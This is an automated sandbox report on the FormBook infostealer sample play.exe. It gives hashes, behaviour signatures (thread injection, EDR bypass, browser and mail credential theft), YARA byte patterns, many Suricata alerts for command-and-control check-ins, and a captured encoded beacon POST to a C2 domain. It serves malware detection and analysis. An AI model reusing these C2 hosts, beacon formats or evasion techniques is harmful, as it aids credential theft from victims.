Edit tour

Windows Analysis Report
play.exe

Overview

General Information

Sample name:	play.exe
Analysis ID:	1502191
MD5:	22b582f31bd1c3a4345df16db968b74c
SHA1:	0756ad4a5bb0afefb30e7fc0e581203b52ab515d
SHA256:	9c1aee7c67abdbfcafee208e0a64ab065cd336d550f1cd66fe91679e9253903a
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

play.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\play.exe" MD5: 22B582F31BD1C3A4345DF16DB968B74C)

aAqvujXSGNo.exe (PID: 4364 cmdline: "C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

relog.exe (PID: 7732 cmdline: "C:\Windows\SysWOW64\relog.exe" MD5: DA20D543A130003B427AEB18AE2FE094)

aAqvujXSGNo.exe (PID: 3004 cmdline: "C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7852 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c2d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x142df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c2d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x142df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x81a9f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x69aae:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x93e5f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7be6e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c2d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x142df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f043:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17052:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c2d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x142df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x81a9f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x69aae:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.play.exe.ba0000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.play.exe.ba0000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f443:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17452:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 52.71.57.184

Timestamp:	2024-08-31T14:05:56.972571+0200
SID:	2855465
Severity:	1
Source Port:	58125
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 200.58.111.42

Timestamp:	2024-08-31T14:05:30.463644+0200
SID:	2855465
Severity:	1
Source Port:	58117
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T14:04:19.876027+0200
SID:	2855464
Severity:	1
Source Port:	58098
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 45.113.201.77

Timestamp:	2024-08-31T14:06:11.114865+0200
SID:	2855465
Severity:	1
Source Port:	58129
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 199.59.243.226

Timestamp:	2024-08-31T14:03:50.988559+0200
SID:	2855465
Severity:	1
Source Port:	58093
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 35.244.245.121

Timestamp:	2024-08-31T14:06:44.938956+0200
SID:	2855464
Severity:	1
Source Port:	58138
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-31T14:05:41.054857+0200
SID:	2855464
Severity:	1
Source Port:	58120
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 200.58.111.42

Timestamp:	2024-08-31T14:05:27.929914+0200
SID:	2855464
Severity:	1
Source Port:	58116
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 84.32.84.32

Timestamp:	2024-08-31T14:04:49.060422+0200
SID:	2855464
Severity:	1
Source Port:	58107
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 84.32.84.32

Timestamp:	2024-08-31T14:04:51.616914+0200
SID:	2855464
Severity:	1
Source Port:	58108
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 35.244.245.121

Timestamp:	2024-08-31T14:06:50.173718+0200
SID:	2855464
Severity:	1
Source Port:	58140
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 84.32.84.32

Timestamp:	2024-08-31T14:04:54.158993+0200
SID:	2855465
Severity:	1
Source Port:	58109
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 52.71.57.184

Timestamp:	2024-08-31T14:05:49.403177+0200
SID:	2855464
Severity:	1
Source Port:	58122
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	2024-08-31T14:06:31.874894+0200
SID:	2855464
Severity:	1
Source Port:	58134
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 35.244.245.121

Timestamp:	2024-08-31T14:06:52.705108+0200
SID:	2855465
Severity:	1
Source Port:	58141
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 85.159.66.93

Timestamp:	2024-08-31T14:04:35.922524+0200
SID:	2855464
Severity:	1
Source Port:	58103
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T14:04:22.439664+0200
SID:	2855464
Severity:	1
Source Port:	58099
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T14:07:03.874673+0200
SID:	2855464
Severity:	1
Source Port:	58144
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 84.32.84.32

Timestamp:	2024-08-31T14:04:46.645721+0200
SID:	2855464
Severity:	1
Source Port:	58106
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T14:06:58.437105+0200
SID:	2855464
Severity:	1
Source Port:	58142
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-31T14:05:38.502411+0200
SID:	2855464
Severity:	1
Source Port:	58119
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 154.23.184.218

Timestamp:	2024-08-31T14:05:10.760150+0200
SID:	2855464
Severity:	1
Source Port:	58111
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 154.23.184.218

Timestamp:	2024-08-31T14:05:08.197843+0200
SID:	2855464
Severity:	1
Source Port:	58110
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	2024-08-31T14:06:33.388002+0200
SID:	2855464
Severity:	1
Source Port:	58135
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 154.23.176.197

Timestamp:	2024-08-31T14:06:19.813353+0200
SID:	2855464
Severity:	1
Source Port:	58131
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 154.23.176.197

Timestamp:	2024-08-31T14:06:17.326314+0200
SID:	2855464
Severity:	1
Source Port:	58130
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-31T14:05:35.972685+0200
SID:	2855464
Severity:	1
Source Port:	58118
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 3.33.244.179

Timestamp:	2024-08-31T14:04:06.693526+0200
SID:	2855464
Severity:	1
Source Port:	58094
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T14:07:01.109106+0200
SID:	2855464
Severity:	1
Source Port:	58143
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 85.159.66.93

Timestamp:	2024-08-31T14:04:33.380975+0200
SID:	2855464
Severity:	1
Source Port:	58102
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T14:04:24.975487+0200
SID:	2855464
Severity:	1
Source Port:	58100
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 3.33.244.179

Timestamp:	2024-08-31T14:04:09.262453+0200
SID:	2855464
Severity:	1
Source Port:	58095
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 154.23.176.197

Timestamp:	2024-08-31T14:06:24.994886+0200
SID:	2855465
Severity:	1
Source Port:	58133
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 3.33.244.179

Timestamp:	2024-08-31T14:04:12.588807+0200
SID:	2855464
Severity:	1
Source Port:	58096
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 35.244.245.121

Timestamp:	2024-08-31T14:06:47.545751+0200
SID:	2855464
Severity:	1
Source Port:	58139
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 85.159.66.93

Timestamp:	2024-08-31T14:04:40.990766+0200
SID:	2855465
Severity:	1
Source Port:	58105
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 154.23.184.218

Timestamp:	2024-08-31T14:05:13.600380+0200
SID:	2855464
Severity:	1
Source Port:	58112
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 52.71.57.184

Timestamp:	2024-08-31T14:05:51.863715+0200
SID:	2855464
Severity:	1
Source Port:	58123
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 45.113.201.77

Timestamp:	2024-08-31T14:06:08.475007+0200
SID:	2855464
Severity:	1
Source Port:	58128
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 52.71.57.184

Timestamp:	2024-08-31T14:05:54.420854+0200
SID:	2855464
Severity:	1
Source Port:	58124
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 154.23.184.218

Timestamp:	2024-08-31T14:05:15.836052+0200
SID:	2855465
Severity:	1
Source Port:	58113
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 200.58.111.42

Timestamp:	2024-08-31T14:05:25.353633+0200
SID:	2855464
Severity:	1
Source Port:	58115
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-31T14:05:43.637486+0200
SID:	2855465
Severity:	1
Source Port:	58121
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	2024-08-31T14:06:36.001515+0200
SID:	2855464
Severity:	1
Source Port:	58136
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 200.58.111.42

Timestamp:	2024-08-31T14:05:23.609814+0200
SID:	2855464
Severity:	1
Source Port:	58114
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 45.113.201.77

Timestamp:	2024-08-31T14:06:03.316702+0200
SID:	2855464
Severity:	1
Source Port:	58126
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	2024-08-31T14:06:38.609677+0200
SID:	2855465
Severity:	1
Source Port:	58137
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 85.159.66.93

Timestamp:	2024-08-31T14:04:38.471609+0200
SID:	2855464
Severity:	1
Source Port:	58104
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T14:04:27.549401+0200
SID:	2855465
Severity:	1
Source Port:	58101
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 154.23.176.197

Timestamp:	2024-08-31T14:06:22.638539+0200
SID:	2855464
Severity:	1
Source Port:	58132
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 45.113.201.77

Timestamp:	2024-08-31T14:06:06.086824+0200
SID:	2855464
Severity:	1
Source Port:	58127
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 3.33.244.179

Timestamp:	2024-08-31T14:04:14.366844+0200
SID:	2855465
Severity:	1
Source Port:	58097
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /qkji/ HTTP/1.1Host: www.soliro.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 205Cache-Control: no-cacheOrigin: http://www.soliro.lifeReferer: http://www.soliro.life/qkji/User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1Data Raw: 5a 58 7a 74 31 6a 64 58 3d 36 6a 6d 65 45 48 38 59 69 52 2f 36 77 59 64 45 4a 37 6a 78 48 4f 39 75 38 59 47 44 73 55 77 52 6e 46 7a 5a 4f 56 54 4e 4e 49 63 46 74 44 70 62 57 35 4c 62 72 33 56 37 45 62 71 6a 6b 70 74 4a 37 4d 75 49 39 70 36 6e 52 34 72 32 6e 4d 48 6b 4f 7a 51 6b 54 58 61 37 35 42 50 6d 70 63 6e 71 75 75 58 47 52 75 49 68 36 48 58 59 2b 42 4c 51 2f 42 31 6e 57 68 73 35 38 2b 36 45 37 6a 4c 78 34 57 48 77 6c 78 47 49 7a 38 39 32 33 71 73 4b 58 2f 53 7a 79 47 46 37 70 54 58 47 6f 56 72 4a 75 53 61 56 71 57 45 2b 63 79 6f 6b 35 62 66 79 68 45 52 57 77 6e 31 2f 72 61 38 73 57 63 71 39 30 41 3d 3d Data Ascii: ZXzt1jdX=6jmeEH8YiR/6wYdEJ7jxHO9u8YGDsUwRnFzZOVTNNIcFtDpbW5Lbr3V7EbqjkptJ7MuI9p6nR4r2nMHkOzQkTXa75BPmpcnquuXGRuIh6HXY+BLQ/B1nWhs58+6E7jLx4WHwlxGIz8923qsKX/SzyGF7pTXGoVrJuSaVqWE+cyok5bfyhERWwn1/ra8sWcq90A==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:04:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYGPKBluqdZiBC4TFP%2FOeD9eFU%2BPTr2U7PPOi9n%2B0sH5hjdurdVj9TCNKt61YwK%2FKKu6cxLFhn%2BD%2BtfgNlX4bk0DMqt2s6TwL26wEAm32x91qK1QLMI5zsqIfgXrYQHKaLOddA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce1e7c9620f3f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 32 63 31 0d 0a 64 54 6d 8b db 38 10 fe 1e b8 ff 30 9b a5 d0 85 78 23 67 1d 7a d8 8e 69 b9 bb 72 07 a5 b7 d0 85 a3 1f 65 6b 1c 0d 2b 4b 3a 69 e2 24 57 fa df 0f 39 c9 be b4 12 c8 92 fc cc a3 99 67 46 aa af 7e ff fb b7 87 af f7 7f 80 e6 c1 34 b3 3a 7d 20 f2 d1 e0 66 ae 91 b6 9a cb 5c 88 37 f3 f4 0b a5 6a 66 f5 80 2c c1 ca 01 37 f3 91 70 ef 5d e0 39 74 ce 32 5a de cc f7 a4 58 6f 14 8e d4 61 36 2d 16 40 96 98 a4 c9 62 27 0d 6e f2 05 44 1d c8 3e 66 ec b2 9e 78 63 5d 62 67 62 83 0d 14 a2 80 cf 8e e1 a3 db 59 f5 cb ac 5e 9e f6 eb c9 a5 e6 fd 80 8a 24 bc f5 01 7b 0c 31 eb 9c 71 21 8b 9d c6 01 4b 25 c3 e3 cd b7 d6 a9 e3 b7 56 76 8f db 90 28 4e 90 f2 5a 08 71 45 43 72 56 5a fe fe bd 5e 9e 08 eb e5 39 aa 64 76 89 fb 64 02 d7 45 51 54 30 c8 b0 25 5b 8a aa 77 96 4b b0 2e 0c d2 40 5e f8 c3 72 25 fc 01 3e 04 92 66 01 7f a2 19 91 a9 93 0b 88 d2 c6 2c 62 a0 be 82 17 12 56 f0 93 57 70 dd f7 7d 95 a2 57 34 fe a0 ba dc b1 ab 60 20 9b bd e2 98 37 90 da 4b 03 c6 03 67 d2 d0 d6 96 d0 a1 65 0c 15 4c ca 97 bf 0a e1 0f 97 10 32 83 3d 97 90 15 a7 4d ef 22 31 39 5b ca 36 3a b3 63 ac 80 9d 2f e1 2e 9d 32 41 d7 e2 4d f2 0d ce ad d6 f9 e5 c4 27 4d 20 89 92 45 fa 0f cb 7c 3d d1 1a b2 f8 e4 f1 69 6b c2 ec 4f 5b ad 33 aa 9a 37 85 28 ea a5 ce 53 51 ad 5e 93 66 c9 89 24 6c f5 4c 0d 77 69 3d 6f 5e d5 85 5e 35 b3 da 37 0f 1a 21 60 74 bb d0 a5 c9 bf 3b 8c 8c 0a 3a b7 33 0a ac 63 68 11 fa 64 03 ce 02 6b 8a 10 31 8c 18 ae ea a5 6f 66 f5 52 d1 d8 9c c7 17 92 9e 8b a6 17 a9 bf 8a 72 e5 0f d5 39 fc 29 43 5e 2a 45 76 5b a6 52 48 6e c2 65 52 3d 09 1c d0 48 a6 11 ab ce a0 0c 65 eb 58 57 cf 39 7d e2 9b 22 Data Ascii: f2c1dTm80x#gzirek+K:i$W9gF~4:} f\7jf,7p]9t2ZXoa6-@b'nD>fxc]bgbY^${1q!K%Vv(NZqECrVZ^9dvdEQT0%[wK.@^r%>f,bVWp}W4` 7KgeL2=M"19[6:c/.2AM'M E\|=ikO[37(SQ^f$lLwi=o^^57!`t;:3chdk1ofRr9)C^*Ev[RHneR=HeXW9}"
